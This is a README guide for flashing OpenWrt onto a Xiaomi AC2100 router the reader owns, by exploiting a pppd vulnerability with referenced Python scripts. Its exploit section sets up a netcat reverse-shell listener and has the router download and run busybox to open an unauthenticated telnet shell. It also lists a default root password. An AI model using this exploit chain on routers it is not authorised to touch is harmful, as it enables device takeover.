a3linux / ac2100-openwrt-guide

This project forked from ecklf/ac2100-openwrt-guide

Install OpenWrt on the AC2100 (black cylinder)

Home Page: https://forum.openwrt.org/t/new-xiaomi-router-ac2100/48101

AC2100 OpenWrt Guide

Acknowledgements and resources

This guide is based on the video by 韩风 Talk. Since many people don't know any Mandarin or don't use Windows, I've decided to write down my method of getting this to work. It also helps people understand more about the process rather than using a one-click solution.

pppoe-simulator.py by Percy233

pppd-cve.py by namidairo

Migrating from old image

You can skip this section if you didn't flash with the old guide.

In case you used the Chinese Redmi image, you can use the sysupgrade package provided in this repo. Since the R2100 (Black Cylinder) is now uniquely identified, you will need to force the system upgrade.

Use any tool of your choice to transfer the sysupgrade.bin to the /tmp directory of your router

sysupgrade -v -F -n /tmp/xiaomi-router-sysupgrade.bin

Intro and Setup

If you find any mistakes in this guide, please submit a PR 👍🏻.

Disclaimer:

You can potentially brick your device. I don't take responsibility for any damage caused.

Requirements

  1. A computer with an ethernet adapter
  2. Two LAN cables
  3. python3, scapy, netcat
  4. Files from this repo

I'll be using a Macintosh in this guide. If you use Linux, I assume you are smart enough to install the required packages yourself. Please note that Python 3 is invoked as python3 on macOS and some Linux distributions. Replace python3 and pip3 with python and pip on Windows/Linux accordingly.

Before we start, please check your python version with:

python --version

Version 2 will not work.

Installing packages (macOS specific)

Go to https://brew.sh/ and run the installation script in your terminal, then proceed to install the required packages:

brew install python3 netcat

Install scapy for python:

pip3 install scapy

1. Download files

  • Clone the repo or download as .zip
  • Make a folder with the following files and cd into it

Feel free to use your own images if you know what you are doing. If you are using the images in this repo, please ensure the provided .bin files have the correct sha256sum:

sha256sum *bin
9242477eaa7df12e00d369d5132b754b76af7dc8e7f4cd9e1c1483aba824ebbe  xiaomi-router-kernel1.bin
141d6af6ae3b41c44fe8fe3728638acf1b286e5f204cd16381593c10f2cdd94c  xiaomi-router-rootfs0.bin
e53c69e2443154feb80320ebc1c58c10e08076f132291f01d9d7f5160c0aed6c  xiaomi-router-sysupgrade.bin
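
To make that check fail loudly before anything is flashed, the script below (an added example, not part of the original repo) compares the three images against the checksums listed above. The function names and the `--check` switch are assumptions of this example; it falls back to `shasum` where `sha256sum` is not installed, as on a stock macOS.

```shell
#!/bin/sh
# Added example: verify the images against the checksums listed in this guide.

# Expected SHA-256 values, copied from the guide above.
EXPECTED_IMAGES='9242477eaa7df12e00d369d5132b754b76af7dc8e7f4cd9e1c1483aba824ebbe  xiaomi-router-kernel1.bin
141d6af6ae3b41c44fe8fe3728638acf1b286e5f204cd16381593c10f2cdd94c  xiaomi-router-rootfs0.bin
e53c69e2443154feb80320ebc1c58c10e08076f132291f01d9d7f5160c0aed6c  xiaomi-router-sysupgrade.bin'

# Print the SHA-256 of one file, using whichever tool is installed.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_manifest DIR MANIFEST
# Returns 0 only if every file named in MANIFEST exists in DIR and matches
# its hash. A missing file counts as a failure, not as "nothing to check".
verify_manifest() {
    dir=$1
    failed=0
    while read -r want name; do
        [ -n "$name" ] || continue
        if [ ! -f "$dir/$name" ]; then
            echo "MISSING  $name" >&2
            failed=1
            continue
        fi
        got=$(sha256_of "$dir/$name")
        if [ "$got" = "$want" ]; then
            echo "OK       $name"
        else
            echo "MISMATCH $name (got $got)" >&2
            failed=1
        fi
    done <<EOF
$2
EOF
    return "$failed"
}

# Check the current folder only when asked: sh verify-images.sh --check
if [ "${1:-}" = "--check" ]; then
    verify_manifest . "$EXPECTED_IMAGES" || { echo "Do not flash these files." >&2; exit 1; }
fi
```
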

2. Reset your router

  • Plug in your AC2100
  • Wait for the system light to turn blue
  • Hold the reset button until the light turns yellow
  • Unplug your router

3. Insert LAN cables

  • Bridge WAN and Port 1 (blue) with your first LAN cable
  • Connect the second LAN cable to Port 2 and your computer (yellow)

4. Setup TCP/IP

  • Go to your network settings
  • Set the following for IPv4

  • Plug in your router
  • Wait for the indicator LED to turn blue

You should now be able to ping the router at 192.168.31.1.

5. Determining your network interface

  • Run ifconfig
  • Check for an interface with configured address 192.168.31.177 (see image below)
  • Change the name of your interface in pppd-cve.py and pppoe-simulator.py (in my case it was en7)

# Line 5 of both script files
interface = "yourinterface"

6. PPPoE simulator

  • Open up http://192.168.31.1 in your browser
  • If there is a terms and conditions screen, click on 马上体验
  • Click on 继续配置 (see image)

Start the pppoe-simulator:

python3 pppoe-simulator.py

You may need to run this as root for scapy to function properly. The script should show Waiting for packets.

Click on the field that says PPPOE.

Enter credentials (anything should be fine). I just use 123 for both. After that click on 下一步.

Requests should now appear in your PPPoE terminal window:

Also your web browser should now display this instead of a loading spinner:

7. Running the exploit

Open up two new terminal sessions.

Start an HTTP server from which we can wget the files later. Make sure to be in the folder that contains the repo files.

python3 -m http.server 80

Start the netcat network utility.

netcat -nvlp 31337

Run pppd-cve.py in a new terminal session:

python3 pppd-cve.py

When the packet has been sent successfully, you should be able to see a connection from 192.168.31.1:63627 in your netcat session.

This connection can be unstable and you may need to rerun netcat and pppd-cve.py if it drops.

If you run the following commands quickly, there should be no issues:

cd /tmp
wget http://192.168.31.177/busybox
chmod a+x ./busybox
./busybox telnetd -l /bin/sh

We should now have telnet access (you can find all commands in commands.txt):

telnet 192.168.31.1

Use wget to pull our files from the http server on the router:

wget http://192.168.31.177/xiaomi-router-rootfs0.bin
wget http://192.168.31.177/xiaomi-router-kernel1.bin && nvram set uart_en=1 && nvram set bootdelay=5 && nvram set flag_try_sys1_failed=1 && nvram commit

Observation: Files are being requested in your http server session:

All that is left now is to write our images:

mtd write xiaomi-router-kernel1.bin kernel1
mtd -r write xiaomi-router-rootfs0.bin rootfs0

Your device should now reboot. First the LED blinks yellow for a couple of seconds before turning blue. When it turns blue again, you have successfully set up OpenWrt. Congratulations!

What you can do now:

  • Close all terminal sessions
  • Revert your TCP/IP settings
  • Remove the bridge cable
  • Connect the router to the internet again

8. Post-install

Connect to your device via ssh.

username: root
password: password

The router IP should be visible in your network settings (in my case http://192.168.1.1). The LuCI web interface is configured with HTTPS on this image. To use HTTPS you need to take additional steps to trust the certificate on your machine. If you just want to bypass the HTTPS errors, you will need to use Firefox and add an exception.

ssh root@routerip
